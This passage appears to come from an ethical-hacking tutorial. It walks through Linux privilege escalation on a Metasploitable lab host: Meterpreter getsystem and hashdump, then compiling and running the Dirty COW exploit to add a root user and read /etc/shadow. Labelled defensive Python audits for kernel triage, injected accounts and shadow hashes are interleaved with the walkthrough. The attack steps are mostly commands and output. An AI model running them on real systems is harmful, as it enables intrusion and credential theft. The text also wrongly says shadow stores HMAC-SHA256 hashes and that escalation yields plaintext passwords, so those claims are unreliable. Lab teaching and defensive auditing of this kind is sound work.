Linux doesn’t store plaintext passwords. Instead, it stores an HMAC-SHA256 hash of the passwords in the file /etc/shadow.
The permissions on the /etc/shadow file indicate that only root and members of the shadow group can read the file, and that only the root user can write to it.
The unix-privesc-check tool is preinstalled on Kali Linux and allows you to check a system for vulnerabilities that might allow a privilege escalation attack:
unix-privesc-check standard
The Meterpreter shell has similar functionality built in. You can use the command getsystem to search for and exploit possible privilege escalation vulnerabilities:
meterpreter > getsystem
After you gain root privileges, run the Meterpreter module to extract the hashes from the system:
meterpreter > run hashdump
Example: Performing a Dirty COW Privilege Escalation Attack
This example uses a kernel-level vulnerability nicknamed Dirty COW. The vulnerability (CVE-2016-5195) allows an attacker without root privileges to edit any file by exploiting a bug in how the Linux kernel manages memory.
Run uname -a to get the current version of Linux:
msfadmin@metasploitable:~$ whoami
msfadmin
msfadmin@metasploitable:~$ uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
When you have the server’s Linux version, use searchsploit to search for known vulnerabilities affecting that version:
kali@kali:~$ searchsploit Linux Kernel 2.6.24
------------------------------------------------ -----------------------
 Exploit Title                                   | Path
------------------------------------------------ -----------------------
Linux Kernel (Solaris 10 / < 5.10 138888-01) -   | solaris/local/15962.c
Linux Kernel 2.4.1 < 2.4.37 / 2.6.1 < 2.6.32-rc  | linux/local/9844.py
...
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW /proc/se  | linux/local/40847.cpp
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW PTRACE_P  | linux/local/40838.c
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE  | linux/local/40839.c
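The searchsploit titles above give an affected range ("Linux Kernel 2.6.22 < 3.9") that a defender can turn into a patch-triage check over uname output. The following is an added example, not code from the book or from searchsploit: it parses the release field of the uname -a line shown above and tests it against that range. The range bounds and the sample uname line come from the page; the function names are this example's own. One caveat belongs with it: distributions backport kernel fixes without bumping the upstream version, so a range match is a signal to confirm against the vendor advisory, not proof that the host is exposed.

```python
"""Kernel-version triage against an affected range (added example).

Parses the release field of `uname -a` output and checks whether it lies in
the range printed in the searchsploit titles above: 2.6.22 <= version < 3.9.
Backported distro fixes make this a triage heuristic, not a verdict.
"""
import re

# Sample uname -a line from the walkthrough above.
SAMPLE_UNAME = ("Linux metasploitable 2.6.24-16-server #1 SMP "
                "Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux")

# Bounds as stated in the searchsploit title "Linux Kernel 2.6.22 < 3.9".
AFFECTED_MIN = (2, 6, 22)       # inclusive
AFFECTED_MAX_EXCL = (3, 9)      # exclusive


def parse_kernel_release(uname_line):
    """Return the kernel version as an int tuple from a `uname -a` line.

    `uname -a` prints "sysname nodename release version ...", so the release
    is the third token (e.g. '2.6.24-16-server'). Only the leading dotted
    digits are kept; the distro suffix after '-' is ignored.
    """
    fields = uname_line.split()
    if len(fields) < 3:
        raise ValueError("not a `uname -a` line: %r" % uname_line)
    m = re.match(r"(\d+(?:\.\d+)*)", fields[2])
    if not m:
        raise ValueError("no version in release field: %r" % fields[2])
    return tuple(int(p) for p in m.group(1).split("."))


def in_affected_range(version, lo=AFFECTED_MIN, hi_excl=AFFECTED_MAX_EXCL):
    """True when lo <= version < hi_excl (component-wise tuple comparison).

    Python compares tuples lexicographically, so (3, 8, 13) < (3, 9) holds
    and (3, 9, 0) < (3, 9) does not, which matches the "< 3.9" bound.
    """
    return lo <= version < hi_excl


def triage(uname_line):
    """Summarise one host: parsed version and whether it needs follow-up."""
    version = parse_kernel_release(uname_line)
    return {
        "release": ".".join(str(p) for p in version),
        "in_affected_range": in_affected_range(version),
        "action": ("confirm patch level against vendor advisory"
                   if in_affected_range(version) else "outside stated range"),
    }


if __name__ == "__main__":
    print(triage(SAMPLE_UNAME))
```

Running it against the sample line reports release 2.6.24 inside the stated range; the action text deliberately sends the analyst to the vendor advisory rather than declaring the host vulnerable.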
Some exploits are more reliable than others. The Dirty COW PTRACE exploit works reliably on the Linux version running on the Metasploitable server. The code for the exploit is available on your Kali Linux virtual machine. Using searchsploit, supply the exploit number 40839.c, and use the -p option to find the path to the exploit code:
kali@kali:~$ searchsploit -p 40839
  Exploit: Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation (/etc/passwd Method)
      URL: https://www.exploit-db.com/exploits/40839
     Path: /usr/share/exploitdb/exploits/linux/local/40839.c
File Type: C source, ASCII text, with CRLF line terminators
Use scp to copy the code onto the Metasploitable machine:
kali@kali:~/$ scp /usr/share/exploitdb/exploits/linux/local/40839.c msfadmin@192.168.1.101:~/
Compile the exploit:
msfadmin@metasploitable:~$ gcc -pthread 40839.c -o kernelexploit -lcrypt
Now run the exploit (kernelexploit). You’ll be prompted to create a new root user (firefart) and provide it with a password. I’ve chosen 147 here:
msfadmin@metasploitable:~$ ./kernelexploit
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password: 147
Complete line:
firefart:fibyOYsv7UnQ6:0:0:pwned:/root:/bin/bash
mmap: b7fa7000
madvise 0
ptrace 0
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password '147'.
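The line the exploit appends to /etc/passwd is also what gives it away to a defender: a second UID 0 account, and a password hash sitting in the passwd file instead of the 'x' placeholder that defers to /etc/shadow. The following audit is an added example, not code from the book or from the exploit: it parses a passwd file, flags both properties, and diffs the live file against a baseline copy (the exploit output above notes that it saved one at /tmp/passwd.bak). Only the firefart line comes from the page; the rest of the sample file content and all function names are constructed for this example.

```python
"""Audit /etc/passwd for injected root accounts (added example).

Flags (1) any UID 0 entry other than the expected root account, (2) any
password field holding a hash rather than 'x' or a lock marker, and
(3) account names that appear in the current file but not in a baseline.
"""

PASSWD_FIELDS = ("name", "passwd", "uid", "gid", "gecos", "home", "shell")

# Constructed baseline: the passwd file before the exploit ran.
BASELINE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
msfadmin:x:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash
"""

# Constructed current file: the baseline plus the line from the exploit
# output above.
CURRENT_PASSWD = BASELINE_PASSWD + \
    "firefart:fibyOYsv7UnQ6:0:0:pwned:/root:/bin/bash\n"


def parse_passwd(text):
    """Yield a dict per passwd line; malformed lines yield {'lineno','malformed'}."""
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(":")
        if len(parts) != len(PASSWD_FIELDS):
            yield {"lineno": lineno, "malformed": line}
            continue
        entry = dict(zip(PASSWD_FIELDS, parts))
        entry["lineno"] = lineno
        yield entry


def audit_passwd(text, expected_uid0=("root",)):
    """Return (lineno, account, reason) findings for the given passwd text."""
    findings = []
    for e in parse_passwd(text):
        if "malformed" in e:
            findings.append((e["lineno"], None, "malformed line"))
            continue
        if e["uid"] == "0" and e["name"] not in expected_uid0:
            findings.append((e["lineno"], e["name"], "unexpected UID 0 account"))
        if e["passwd"] == "":
            findings.append((e["lineno"], e["name"], "empty password field"))
        elif e["passwd"] not in ("x", "*", "!", "!!"):
            # 'x' defers to /etc/shadow; '*', '!' and '!!' are lock markers.
            # Anything else is a hash stored outside the shadow file.
            findings.append((e["lineno"], e["name"], "password hash stored in passwd"))
    return findings


def accounts_added(baseline_text, current_text):
    """Account names present in the current file but absent from the baseline."""
    base = {e["name"] for e in parse_passwd(baseline_text) if "name" in e}
    cur = {e["name"] for e in parse_passwd(current_text) if "name" in e}
    return sorted(cur - base)


if __name__ == "__main__":
    for finding in audit_passwd(CURRENT_PASSWD):
        print("line %d: %s: %s" % finding)
    print("added accounts:", accounts_added(BASELINE_PASSWD, CURRENT_PASSWD))
```

On a live host the same functions take the contents of /etc/passwd and of a trusted baseline (a configuration-management copy or a file-integrity snapshot); the baseline comparison is what catches an injected account even when the attacker picks a less obvious name than firefart.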
Switch to the newly created user with root privileges:
msfadmin@metasploitable:~$ su firefart
Password:
Now you should be able to read the /etc/shadow file containing the password hashes:
firefart@metasploitable:/home/msfadmin# cat /etc/shadow
root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.:14747:0:999:7:::
daemon:*:14684:0:999:7:
bin:*:14684:0:999:7:
sys:$1$fUX6BPOt$Miyc3UpOzQJqz4s5wFD9l0:14742:0:9999:7:
...
The entries should contain the HMAC-SHA256 hash of the users’ passwords. If you succeed, you’ll have escalated your privileges and extracted the plaintext passwords for the system’s users.
Tools like spray allow you to test multiple passwords and connections simultaneously. However, these tools do unusual things and could generate security alerts, so you’ll want to be careful when using them.
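The /etc/shadow description at the top of this section and the shadow output above both point at two checks a defender wants to run routinely: which hashing scheme each account actually uses, read from the $id$ prefix that crypt(3) places in front of the hash (the root and sys entries above carry $1$), together with any empty or locked password fields; and whether the file's mode and ownership still restrict reading to root and the shadow group. The following is an added example, not code from the book: the sample entries copy the root, daemon, bin and sys lines from the output above, and the stat values, the default shadow GID of 42 and all function names are assumptions made for this example.

```python
"""Audit /etc/shadow hash schemes and file permissions (added example).

classify_hash() maps a shadow password field to the crypt(3) scheme named by
its `$id$` prefix, or to 'locked' / 'EMPTY' for lock markers and blank
fields. shadow_perms_ok() checks a stat() result against the expected
-rw-r----- root:shadow layout.
"""
import stat

# Sample entries copied from the cat /etc/shadow output above.
SAMPLE_SHADOW = """\
root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.:14747:0:999:7:::
daemon:*:14684:0:999:7:
bin:*:14684:0:999:7:
sys:$1$fUX6BPOt$Miyc3UpOzQJqz4s5wFD9l0:14742:0:9999:7:
"""

# crypt(3) scheme identifiers as used in glibc/libxcrypt password fields.
SCHEMES = {
    "1": "md5crypt",
    "2a": "bcrypt", "2b": "bcrypt", "2y": "bcrypt",
    "5": "sha256crypt",
    "6": "sha512crypt",
    "7": "scrypt",
    "y": "yescrypt",
}


def classify_hash(field):
    """Return a label describing one shadow password field."""
    if field == "":
        return "EMPTY (no password required)"
    if field.startswith(("*", "!")):
        return "locked"
    if field.startswith("$"):
        # "$6$salt$hash".split("$") -> ['', '6', 'salt', 'hash']
        scheme_id = field.split("$")[1]
        return SCHEMES.get(scheme_id, "unknown scheme $%s$" % scheme_id)
    if len(field) == 13:
        return "traditional DES crypt"
    return "unrecognized"


def audit_shadow(text):
    """Return {account: label}; tolerates lines with fewer than 9 fields."""
    result = {}
    for raw in text.splitlines():
        if not raw.strip():
            continue
        parts = raw.split(":")
        if len(parts) < 2:
            continue
        result[parts[0]] = classify_hash(parts[1])
    return result


def shadow_perms_ok(mode, uid, gid, shadow_gid=42):
    """True when mode/uid/gid match a regular file owned by root, group root
    or shadow, with no 'other' bits and at most read for the group
    (-rw-r----- root shadow). shadow_gid=42 is Debian's conventional value
    and an assumption of this example; pass the host's actual value."""
    if not stat.S_ISREG(mode):
        return False
    if uid != 0 or gid not in (0, shadow_gid):
        return False
    if mode & stat.S_IRWXO:
        return False
    if mode & (stat.S_IWGRP | stat.S_IXGRP):
        return False
    return True


if __name__ == "__main__":
    import os
    for account, label in audit_shadow(SAMPLE_SHADOW).items():
        print("%-8s %s" % (account, label))
    try:
        st = os.stat("/etc/shadow")
        print("permissions ok:", shadow_perms_ok(st.st_mode, st.st_uid, st.st_gid))
    except OSError as exc:
        print("could not stat /etc/shadow:", exc)
```

Any account labelled EMPTY, any world-readable mode, and any scheme you did not expect on that host (for instance md5crypt where the build standard is sha512crypt or yescrypt) are the findings worth raising from this audit.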